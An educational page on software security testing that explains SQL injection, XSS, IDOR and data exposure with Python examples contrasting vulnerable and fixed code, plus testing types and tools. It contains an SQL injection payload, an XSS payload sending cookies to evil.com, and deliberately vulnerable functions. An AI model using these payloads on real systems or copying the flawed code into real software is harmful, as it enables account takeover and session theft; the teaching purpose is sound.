Software Testing: Security Testing
Security testing identifies vulnerabilities in software that an attacker could exploit to gain unauthorised access, steal data, or disrupt service. It is not just for large corporations — any software that handles user data, payments, or login credentials needs security testing.
What Security Testing Protects
┌─────────────────────────────────────────────────────────────────┐
│ CONFIDENTIALITY → Data is visible only to allowed users         │
│ INTEGRITY       → Data cannot be altered without authorisation  │
│ AVAILABILITY    → System stays up and accessible                │
│ AUTHENTICATION  → Users are who they claim to be                │
│ AUTHORISATION   → Users reach only what they are permitted to   │
│ NON-REPUDIATION → Actions are traceable to their actor          │
└─────────────────────────────────────────────────────────────────┘
Common Security Vulnerabilities
SQL Injection
An attacker types SQL syntax into an input field. If the application builds its query by concatenating that input into the SQL text, the input becomes part of the command, and the attacker can read, modify, or delete whatever data the application's database account can reach. The fix is parameterised queries (prepared statements), which send values separately from the SQL; filtering quote characters is not a reliable substitute.

Login form, username field:
  Normal input:  user@test.com
  Attack input:  ' OR '1'='1

If vulnerable, the SQL becomes:
  SELECT * FROM users WHERE email='' OR '1'='1'
  → The WHERE clause is true for every row, so ALL user records are returned
  → The application usually takes the first row, so the attacker is logged in as that user (often the first account created, which is frequently the administrator)
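The query above, run against a real database engine, as an added example that is not part of the original page. It uses Python's built-in sqlite3 module and a constructed in-memory users table (the schema, rows and function names are assumptions for this example). The vulnerable lookup concatenates the input as the page describes; the fixed one is the same query parameterised; the probe at the end is the kind of check a dynamic security test performs: a payload must never return more rows than an address that matches nobody.

```python
import sqlite3

ATTACK_INPUT = "' OR '1'='1"   # the payload from the example above


def make_db():
    """Build an in-memory database with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (email, role) VALUES (?, ?)",
        [("admin@test.com", "admin"), ("user@test.com", "user"), ("alice@test.com", "user")],
    )
    return conn


def find_user_vulnerable(conn, email):
    """VULNERABLE: the input is spliced into the SQL text, so quotes in it change the query."""
    sql = "SELECT id, email, role FROM users WHERE email='" + email + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, email):
    """FIXED: a parameterised query. The driver passes the value separately from the SQL,
    so the payload is compared literally against the email column and matches nothing."""
    sql = "SELECT id, email, role FROM users WHERE email=?"
    return conn.execute(sql, (email,)).fetchall()


def injection_probe(conn, lookup):
    """DAST-style check: an email that matches nobody must return no rows. If the injection
    payload returns rows where a harmless unknown address returns none, the lookup is
    treating its input as SQL."""
    baseline = lookup(conn, "nobody@test.com")
    attacked = lookup(conn, ATTACK_INPUT)
    return len(attacked) > len(baseline)


if __name__ == "__main__":
    conn = make_db()
    print("normal :", find_user_vulnerable(conn, "user@test.com"))
    print("attack :", find_user_vulnerable(conn, ATTACK_INPUT))   # every row comes back
    print("fixed  :", find_user_safe(conn, ATTACK_INPUT))         # []
    print("vulnerable?", injection_probe(conn, find_user_vulnerable))
    print("vulnerable?", injection_probe(conn, find_user_safe))
```

The probe compares counts rather than looking for an error message because a well-hardened application hides database errors; a difference in behaviour between a harmless value and a payload is what a tester looks for.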
Cross-Site Scripting (XSS)
An attacker submits script into content that the application later shows to other users. The victim's browser runs the script in the context of the site, so it can read anything the page can read, redirect the user, or perform actions on their behalf using their logged-in session.

Comment field input:
  Normal:  "Great article!"
  Attack:  <script>document.location='evil.com?c='+document.cookie</script>

If the app displays comments without encoding them for HTML:
  → Other users' browsers execute the script
  → Attacker receives their session cookies (a cookie marked HttpOnly cannot be read by script, but the script can still act as the user from inside the page)
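The comment from the example rendered both ways, as an added example that is not code from the original page. It uses Python's standard html module; the HTML snippets, the link helper and the http(s)-only rule for links are assumptions for this example. The link helper is there because escaping alone is not enough once user input lands in an attribute: a javascript: URL contains no angle brackets, survives escaping unchanged, and executes when the link is clicked.

```python
import html

# The comment payload from the example above and a benign comment (constructed inputs).
ATTACK_COMMENT = "<script>document.location='evil.com?c='+document.cookie</script>"
NORMAL_COMMENT = "Great article!"


def render_comment_vulnerable(comment):
    """VULNERABLE: user text is concatenated straight into the HTML, so markup in it
    becomes part of the page and every browser that loads the page runs the script."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """FIXED: encode for the HTML body context. '<', '>', '&' and both quote characters
    become entities, so the browser displays the text instead of parsing it as tags."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_link_safe(label, url):
    """Attribute context needs more than encoding: a javascript: URL is harmless as text
    but executes as an href. Allow only http(s) links (assumed to be all the app needs)."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(label, quote=True))


def has_script_tag(page):
    """Tester's check: after rendering the payload, the page must not contain a script tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACK_COMMENT))  # the script tag reaches the page
    print(render_comment_safe(ATTACK_COMMENT))        # &lt;script&gt;... shown as text
    print(render_link_safe("click", "javascript:alert(document.cookie)"))  # href="#"
```

Encoding is context-specific: the same input needs HTML-entity encoding in the body, attribute encoding inside quoted attributes, and a URL scheme check when it becomes a link target. A tester tries the payload in each place the input is reflected.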
Broken Authentication
Weak session management (session tokens that are predictable, never expire, or survive logout), no protection against credential stuffing and brute force, or the absence of multi-factor authentication lets attackers impersonate legitimate users.
Insecure Direct Object References (IDOR)
A user changes an identifier in a URL parameter, form field, or API request to reach another user's data, and the server looks the object up without checking that the requester is allowed to see it.

Normal URL:   /account/orders?user_id=1001
Manipulated:  /account/orders?user_id=1002

If the server does not check ownership
  → User 1001 sees User 1002's orders
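The orders endpoint from the example as three handlers, as an added example that is not part of the original page. The order data, the handler signatures and the idea of passing the session's user id in as a parameter are assumptions for this example; a web framework would supply the session object. The first handler trusts the URL; the second adds the ownership check; the third removes the tamperable parameter altogether, which is the design a reviewer would push for.

```python
from http import HTTPStatus

# Constructed sample data: which orders belong to which user (an assumption for this example).
ORDERS = {
    1001: ["order-A1", "order-A2"],
    1002: ["order-B1"],
}


def orders_handler_vulnerable(session_user_id, requested_user_id):
    """VULNERABLE: the handler trusts user_id from the URL and never compares it with the
    authenticated user, so any logged-in user can read any other user's orders."""
    return HTTPStatus.OK, ORDERS.get(requested_user_id, [])


def orders_handler_safe(session_user_id, requested_user_id):
    """FIXED: the ownership check. The requested object is compared with the identity
    established at login (the session), never with anything else the client sends."""
    if session_user_id is None:
        return HTTPStatus.UNAUTHORIZED, []
    if requested_user_id != session_user_id:
        return HTTPStatus.FORBIDDEN, []
    return HTTPStatus.OK, ORDERS.get(requested_user_id, [])


def orders_handler_better(session_user_id):
    """Stronger still: drop the parameter. The server already knows who is asking, so
    /account/orders is scoped to the session and there is nothing to tamper with."""
    if session_user_id is None:
        return HTTPStatus.UNAUTHORIZED, []
    return HTTPStatus.OK, ORDERS.get(session_user_id, [])


def idor_test(handler):
    """Tester's check: log in as 1001 and ask for 1002's orders. Anything but a refusal
    with an empty body is an IDOR finding."""
    status, body = handler(1001, 1002)
    return status == HTTPStatus.FORBIDDEN and body == []


if __name__ == "__main__":
    print(orders_handler_vulnerable(1001, 1002))   # (200, ['order-B1'])  <- leak
    print(orders_handler_safe(1001, 1002))         # (403, [])
    print(orders_handler_better(1001))             # (200, ['order-A1', 'order-A2'])
```

When testing for IDOR, use two accounts you control, capture an identifier belonging to one, and replay it from the other's session; also try identifiers that are sequential, since the example's 1001/1002 numbering makes every other user's objects trivially guessable.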
Sensitive Data Exposure
Typical cases: passwords stored as plain text, credit card numbers written to error logs, or API keys hardcoded in source code (and therefore in version control history and every copy of the repository).
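What "stored as plain text" versus stored correctly looks like in code, as an added example that is not part of the original page. It uses only Python's standard library (hashlib, hmac, secrets); the demo password, the record format and the function names are assumptions for this example. PBKDF2 is used because it ships with Python; a dedicated password hash such as Argon2 or bcrypt is the better choice when a library for it is available, and the same salt-then-slow-hash-then-constant-time-compare pattern applies.

```python
import hashlib
import hmac
import secrets

# Constructed credential for the example (an assumption, not data from any real system).
DEMO_PASSWORD = "correct horse battery staple"


def store_plaintext(password):
    """VULNERABLE: what 'passwords stored as plain text' means. Any database dump, backup
    or log line containing this field hands the attacker the credential directly."""
    return password


def store_hashed(password, iterations=600_000):
    """FIXED: a salted, deliberately slow hash. Each password gets a random 16-byte salt so
    identical passwords produce different records, and PBKDF2-HMAC-SHA256 with many
    iterations makes offline guessing expensive. Stored as algorithm$iterations$salt$hash."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_hashed(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time
    (hmac.compare_digest) so the comparison does not leak how many bytes matched."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def leaks_secret(record, password):
    """Tester's check on a stored record, a backup or a log line: the password must not
    be recoverable by simply reading the text."""
    return password in record


if __name__ == "__main__":
    rec = store_hashed(DEMO_PASSWORD)
    print(rec)
    print(verify_hashed(DEMO_PASSWORD, rec), verify_hashed("wrong", rec))
    print(leaks_secret(store_plaintext(DEMO_PASSWORD), DEMO_PASSWORD), leaks_secret(rec, DEMO_PASSWORD))
```

The same check extends to the other cases in this section: grep logs and error pages for card numbers and tokens the application handled, and grep the repository history, not just the current tree, for keys.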
Security Misconfiguration
Default admin credentials left unchanged, unnecessary features or debug modes left enabled, directory listings exposed, or error pages and stack traces that reveal internal server details (framework versions, file paths, database names) to attackers.
Types of Security Testing
Vulnerability Scanning
Automated tools scan the application and its infrastructure for known vulnerabilities and insecure settings. Tools like OWASP ZAP, Nessus, and Burp Suite perform these scans. A scanner finds only the classes of issues it has checks for, and each finding still needs a person to confirm that it is real and reachable, so the output is a starting list, not a verdict.
Penetration Testing (Pen Testing)
A human security expert simulates a real attack on the system, within a scope and under written authorisation agreed with the owner beforehand. Unlike automated scanning, pen testers use creativity and experience to chain weaknesses and to find vulnerabilities that tools miss, such as logic flaws in a checkout or an approval workflow. The result is a report of each weakness found, how it was exploited, its severity, and what to do about it.

Pen Test Phases:
──────────────────────────────────────────
1. Reconnaissance → Gather info about the target
2. Scanning       → Find open ports and services
3. Exploitation   → Attempt to exploit vulnerabilities
4. Post-Exploit   → Assess damage potential
5. Reporting      → Document everything found
Static Application Security Testing (SAST)
Analyses the source code for security flaws without running the application. Finds issues like hardcoded passwords, unsafe function calls, and queries built by string concatenation early in development, often as part of the build or a pull-request check. Because it never sees the program run, it also flags code that is unreachable in practice, so its findings need triage.
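A minimal SAST check of the kind described above, as an added example that is not part of the original page and not the logic of any real tool. The four rules, the regular expressions and the sample source file being scanned are all constructed for this example; a real SAST tool carries hundreds of rules and reasons about the program's structure and data flow rather than matching text line by line, which is why this toy version both misses real problems and raises false positives.

```python
import re

# Rules as (name, pattern). Constructed for this example; real tools parse the code.
RULES = [
    ("hardcoded-secret", re.compile(r"""(?i)(password|secret|api_key|token)\s*=\s*["'][^"']{4,}["']""")),
    ("unsafe-eval", re.compile(r"\b(eval|exec)\s*\(")),
    ("shell-injection", re.compile(r"subprocess\.\w+\([^)]*shell\s*=\s*True")),
    ("sql-string-concat", re.compile(r"""(?i)["']\s*SELECT\b.*?["']\s*\+""")),
]

# Constructed sample source file to scan (an assumption, not code from any real project).
SAMPLE_SOURCE = '''\
import subprocess
DB_PASSWORD = "hunter2-prod"
def run(cmd):
    return subprocess.run(cmd, shell=True)
def lookup(conn, email):
    return conn.execute("SELECT * FROM users WHERE email='" + email + "'")
def calc(expr):
    return eval(expr)
'''


def scan_source(source):
    """Run every rule over every line; return (line number, rule name, line text) per hit.
    The code is never executed, which is what makes this static analysis."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


if __name__ == "__main__":
    for lineno, rule, text in scan_source(SAMPLE_SOURCE):
        print("line %d: %-18s %s" % (lineno, rule, text))
```

Each hit maps to a section above: the hardcoded credential is Sensitive Data Exposure, the concatenated query is the SQL Injection pattern, and the shell and eval calls are injection of a different kind. The "hardcoded-secret" rule will also fire on test fixtures and placeholders, which is the triage cost the paragraph mentions.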
Dynamic Application Security Testing (DAST)
Tests the running application by sending attacks to it from the outside, just like a real attacker would, without access to the source. Finds vulnerabilities that only show up at runtime, such as server and framework misconfiguration, or flaws in deployed components that are not part of the application's own code.
API Security Testing
Tests API endpoints for broken authentication and authorisation (including object-level checks on every endpoint, not just the web UI), missing rate limiting, responses that return more fields than the client needs, and injection vulnerabilities.
The OWASP Top 10
The Open Worldwide Application Security Project (OWASP, formerly the Open Web Application Security Project) publishes a list of the ten most critical web application security risks. Every tester should know these; the list below is the 2021 edition:

1. Broken Access Control
2. Cryptographic Failures
3. Injection (SQL, XSS, etc.)
4. Insecure Design
5. Security Misconfiguration
6. Vulnerable and Outdated Components
7. Identification and Authentication Failures
8. Software and Data Integrity Failures
9. Security Logging and Monitoring Failures
10. Server-Side Request Forgery (SSRF)
The OWASP Top 10 is updated every few years and is the starting point for any web application security test checklist; it is an awareness list, not a complete standard, so a thorough test goes beyond it.
Security Testing Tools
- OWASP ZAP: Free, open-source scanner for finding web application vulnerabilities.
- Burp Suite: Industry-standard web security testing platform used by professional pen testers.
- Nessus: Vulnerability scanner for networks and infrastructure.
- SQLMap: Automated tool for detecting and exploiting SQL injection vulnerabilities.
- Metasploit: Framework for pen testing and exploit development.
